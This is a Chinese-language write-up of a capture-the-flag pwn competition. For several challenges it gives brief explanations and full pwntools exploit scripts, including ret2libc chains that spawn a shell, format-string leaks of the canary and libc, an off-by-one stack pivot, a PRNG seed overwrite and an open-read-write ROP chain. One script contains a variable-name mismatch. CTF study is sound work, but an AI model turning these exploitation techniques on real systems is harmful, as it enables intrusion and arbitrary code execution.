girlfriend

第六个数组输入的时候,输入的值将决定循环的顺序,再填入后门

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from pwn import *
context(log_level='debug')
#p=process('./pwn')
p=remote('27.25.151.12',25622)

ret=0x40101a
gift=0x401216
payload=p64(gift)*5+b'admin'+b'\x00'*2
p.sendline(payload)


p.sendline(b'100')
p.sendline(b'100')
p.sendline(b'100')
p.sendline(b'100')
p.sendline(b'300')
#gdb.attach(p)
#pause()
p.sendline(b'5')
p.sendlineafter(b'please input your 7 girlfriend birthday',b'1')
p.sendlineafter(b'please input your 8 girlfriend birthday',b'4198942')

p.interactive()

ez_game

伪随机数通过溢出覆盖seed,再按照题目给的进行输入就好

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
from ctypes import *
context(log_level='debug')
p=remote('27.25.151.12',39274)

payload=b'a'*0x190+p64(1)
p.sendline(payload)
elf = cdll.LoadLibrary('./libc.so.6')
elf.srand(1)

p.recvuntil('Round')
for i in range(20001):
a=elf.rand() % 7 + 1
p.sendline(str(a))


p.interactive()

ret2orw

题目开了沙箱,只能orw

这题本来想在本地写shellcode,在栈迁移到bss段执行,理论上应该可以,但是一直没有写出来

看了网上的wp,发现可以直接找open函数read函数和puts完成orw,下面的脚本是网上找到,自己加了点注释

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
#context.terminal = ['wt.exe', 'wsl']
libc = ELF("./libc.so.6")

#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
e = ELF("./pwn")
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
pop_rdi = 0x4012ce
ret = 0x40101a
main = 0x4012a1
bss = 0x4040a0
flag = bss + 0x100

print(shellcraft.open("./flag"))
io = process("./pwn")



get_libc = b"a"*32 + b"b"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
io.sendafter(b"oh,what's this?\n", get_libc)
puts_addr = u64(io.recvuntil(b'\x7f').ljust(8,b'\x00'))

libc_base = puts_addr - libc.sym["puts"]
print(hex(libc_base))
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
pop_rsi = libc_base + 0x2be51
pop_rdxi_r12 = libc_base + 0x11f2e7

gdb.attach(io)
pause()

payload = b"c"*32 + b"d"*8

#写./flag到bss+0x100
payload += p64(pop_rsi) + p64(bss) + p64(read_addr)

#open
payload += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) +p64(pop_rdx_r12) + p64(0) + p64(0)+ p64(open_addr)

#read
payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(flag) + p64(pop_rdx_r12) + p64(0x100) + p64(0)+ p64(read_addr)

#打印出flag
payload += p64(pop_rdi) + p64(flag) + p64(puts_addr)

io.send(payload)

io.send(b"./flag")
io.interactive()

小蓝鲨stack

ret2libc注意printf要栈对齐

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
from pwn import *
from LibcSearcher import *
context(log_level='debug')


#p = process('./pwn')
p=remote('27.25.151.12',32833)
elf = ELF('./pwn')
libc=ELF('./libc-2.31.so')
pop_rdi=0x401293
puts_plt=elf.plt['printf']
puts_got=elf.got['printf']
ret=0x40101a
offset=32

main_addr=elf.sym['main']

payload=b'a'*offset+b'a'*8

payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(ret)
payload+=p64(puts_plt)
payload+=p64(ret)
payload+=p64(main_addr)
#gdb.attach(p)
#pause()
p.sendline(payload)

#leak_addr= u64(p.recvuntil(b"\x7f").ljust(8, b"\x00"))
leak_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))

log.success("leak_addr:{}".format((hex)(leak_addr)))

#libc = LibcSearcher("puts",leak_addr)

libc_base=leak_addr-libc.sym['printf']
system_addr=libc_base+libc.sym['system']
bin_sh_addr=libc_base+next(libc.search(b'/bin/sh'))


log.success("libc_base:{}".format((hex)(libc_base)))
log.success("system_addr:{}".format((hex)(system_addr)))
log.success("bin_sh_addr:{}".format((hex)(bin_sh_addr)))


payload2=b'a'*offset+b'a'*8
payload2+=p64(ret)+p64(pop_rdi)
payload2+=p64(bin_sh_addr)+p64(system_addr)

p.sendline(payload2)

p.interactive()

0verf10w

格式化字符串把canary,libc,还有栈(后面利用off-by-one栈迁移)的地址泄露出来,刚好看到后面vuln有个off-by-one,通过溢出rbp后一个字节导致函数到我们写完数据的地方重启main函数

不知道为什么我本地打这个一直打不通,不过也就是最后一步,system函数被变成其他的,好在远程打得通,不然真怀疑人生了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
context(log_level='debug')
#p=process('./pwn')
p=remote('27.25.151.12',30861)

libc = ELF("./libc.so.6")
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p.sendlineafter(b' that?',b'aaaaaaaa')
payload=b'aaaaaaaa%29$p%11$p%15$p%13$p'

def debug():
gdb.attach(p)
pause()


#debug()
p.sendline(payload)
p.recvuntil(b'0x')
canary=int(p.recv(14).ljust(16,b'0'),16)
p.recvuntil(b'0x')

libc_base=int(p.recv(12),16)-0x29d90
p.recvuntil(b'0x')

stack=int(p.recv(12),16)-0x60

p.recvuntil(b'0x')
main=int(p.recv(12),16)

system_addr = libc_base + libc.sym["system"]
binsh_addr = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi = libc_base + 0x2a3e5
ret = libc_base+0x29139


last_byte = (stack & 0xFF)

print(hex(canary))
print(hex(main))
print(hex(libc_base))

payload=p64(canary)*2+p64(main)+p64(canary)+p8(last_byte)
#debug()
p.send(payload)


payload2=b'a'*(0x14-0x8)+p64(canary)*2+p64(pop_rdi) + p64(binsh_addr)+p64(ret)+p64(system_addr)
p.sendline(payload2)

p.sendafter(b'a gift!',b'a')
p.sendafter(b'again?????',b'a')

p.interactive()

syscall(没出)

给了三次执行syscall的机会,四个参数可以任意调整,不知道为什么利用shmget+shmat就把libc泄露出来了

orange

没学到io怎么打。。。。,回头学完再来